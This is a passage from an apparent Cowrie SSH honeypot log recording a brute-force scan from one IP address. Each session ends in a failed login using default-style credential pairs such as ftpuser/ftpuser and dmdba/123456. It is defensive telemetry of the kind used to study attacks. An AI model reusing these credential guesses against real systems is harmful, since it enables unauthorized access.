a2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:04.691138Z","src_ip":"212.227.125.160","session":"7e75444c566c"}
{"eventid":"cowrie.login.failed","username":"aes-admin","password":"aes-admin","message":"login attempt [aes-admin/aes-admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:04.845469Z","src_ip":"212.227.125.160","session":"7e75444c566c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:05.911613Z","src_ip":"212.227.125.160","session":"7e75444c566c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54528,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d0c4c539302","protocol":"ssh","message":"New connection: 212.227.125.160:54528 (1.2.3.4:22) [session: 8d0c4c539302]","sensor":"my-vps","timestamp":"2025-08-26T21:57:09.949195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:09.959321Z","src_ip":"212.227.125.160","session":"8d0c4c539302"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:10.012230Z","src_ip":"212.227.125.160","session":"8d0c4c539302"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:10.261542Z","src_ip":"212.227.125.160","session":"8d0c4c539302"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:11.320026Z","src_ip":"212.227.125.160","session":"8d0c4c539302"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49914,"dst_ip":"1.2.3.4","dst_port":22,"session":"4696227271ef","protocol":"ssh","message":"New connection: 212.227.125.160:49914 (1.2.3.4:22) [session: 4696227271ef]","sensor":"my-vps","timestamp":"2025-08-26T21:57:15.815657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:15.816436Z","src_ip":"212.227.125.160","session":"4696227271ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:15.869591Z","src_ip":"212.227.125.160","session":"4696227271ef"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:16.572175Z","src_ip":"212.227.125.160","session":"4696227271ef"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:17.721020Z","src_ip":"212.227.125.160","session":"4696227271ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45306,"dst_ip":"1.2.3.4","dst_port":22,"session":"20283dd08439","protocol":"ssh","message":"New connection: 212.227.125.160:45306 (1.2.3.4:22) [session: 20283dd08439]","sensor":"my-vps","timestamp":"2025-08-26T21:57:21.498688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:21.499611Z","src_ip":"212.227.125.160","session":"20283dd08439"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:21.564282Z","src_ip":"212.227.125.160","session":"20283dd08439"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"123456","message":"login attempt [dmdba/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:22.326214Z","src_ip":"212.227.125.160","session":"20283dd08439"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:23.386987Z","src_ip":"212.227.125.160","session":"20283dd08439"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40690,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a46b215f296","protocol":"ssh","message":"New connection: 212.227.125.160:40690 (1.2.3.4:22) [session: 1a46b215f296]","sensor":"my-vps","timestamp":"2025-08-26T21:57:26.832264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:26.845931Z","src_ip":"212.227.125.160","session":"1a46b215f296"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:26.894881Z","src_ip":"212.227.125.160","session":"1a46b215f296"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:27.729041Z","src_ip":"212.227.125.160","session":"1a46b215f296"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:28.781653Z","src_ip":"212.227.125.160","session":"1a46b215f296"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36078,"dst_ip":"1.2.3.4","dst_port":22,"session":"4002eaf04f26","protocol":"ssh","message":"New connection: 212.227.125.160:36078 (1.2.3.4:22) [session: 4002eaf04f26]","sensor":"my-vps","timestamp":"2025-08-26T21:57:32.532810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:32.534813Z","src_ip":"212.227.125.160","session":"4002eaf04f26"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:32.581094Z","src_ip":"212.227.125.160","session":"4002eaf04f26"}
{"eventid":"cowrie.login.failed","username":"ec2","password":"ec2","message":"login attempt [ec2/ec2] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:32.733028Z","src_ip":"212.227.125.160","session":"4002eaf04f26"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:33.844772Z","src_ip":"212.227.125.160","session":"4002eaf04f26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59698,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9d3711e6833","protocol":"ssh","message":"New connection: 212.227.125.160:59698 (1.2.3.4:22) [session: a9d3711e6833]","sensor":"my-vps","timestamp":"2025-08-26T21:57:38.318941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:38.320160Z","src_ip":"212.227.125.160","session":"a9d3711e6833"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:38.365506Z","src_ip":"212.227.125.160","session":"a9d3711e6833"}
{"eventid":"cowrie.login.failed","username":"user3","password":"user3","message":"login attempt [user3/user3] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:38.509075Z","src_ip":"212.227.125.160","session":"a9d3711e6833"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:39.556495Z","src_ip":"212.227.125.160","session":"a9d3711e6833"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55086,"dst_ip":"1.2.3.4","dst_port":22,"session":"708e9b51f045","protocol":"ssh","message":"New connection: 212.227.125.160:55086 (1.2.3.4:22) [session: 708e9b51f045]","sensor":"my-vps","timestamp":"2025-08-26T21:57:43.573215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:43.573866Z","src_ip":"212.227.125.160","session":"708e9b51f045"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:43.618513Z","src_ip":"212.227.125.160","session":"708e9b51f045"}
{"eventid":"cowrie.login.failed","username":"nxautomation","password":"nxautomation","message":"login attempt [nxautomation/nxautomation] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:43.774645Z","src_ip":"212.227.125.160","session":"708e9b51f045"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:44.846063Z","src_ip":"212.227.125.160","session":"708e9b51f045"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50474,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98f578affc3","protocol":"ssh","message":"New connection: 212.227.125.160:50474 (1.2.3.4:22) [session: d98f578affc3]","sensor":"my-vps","timestamp":"2025-08-26T21:57:49.009282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:49.040032Z","src_ip":"212.227.125.160","session":"d98f578affc3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:49.053279Z","src_ip":"212.227.125.160","session":"d98f578affc3"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:49.239192Z","src_ip":"212.227.125.160","session":"d98f578affc3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:50.371334Z","src_ip":"212.227.125.160","session":"d98f578affc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45860,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dcfda62a56f","protocol":"ssh","message":"New connection: 212.227.125.160:45860 (1.2.3.4:22) [session: 3dcfda62a56f]","sensor":"my-vps","timestamp":"2025-08-26T21:57:54.761263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:54.774104Z","src_ip":"212.227.125.160","session":"3dcfda62a56f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:57:54.811709Z","src_ip":"212.227.125.160","session":"3dcfda62a56f"}
{"eventid":"cowrie.login.failed","username":"amavis","password":"amavis","message":"login attempt [amavis/amavis] failed","sensor":"my-vps","timestamp":"2025-08-26T21:57:55.015720Z","src_ip":"212.227.125.160","session":"3dcfda62a56f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:57:56.077104Z","src_ip":"212.227.125.160","session":"3dcfda62a56f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41252,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4c32e11780f","protocol":"ssh","message":"New connection: 212.227.125.160:41252 (1.2.3.4:22) [session: b4c32e11780f]","sensor":"my-vps","timestamp":"2025-08-26T21:58:00.190162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:00.194818Z","src_ip":"212.227.125.160","session":"b4c32e11780f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@op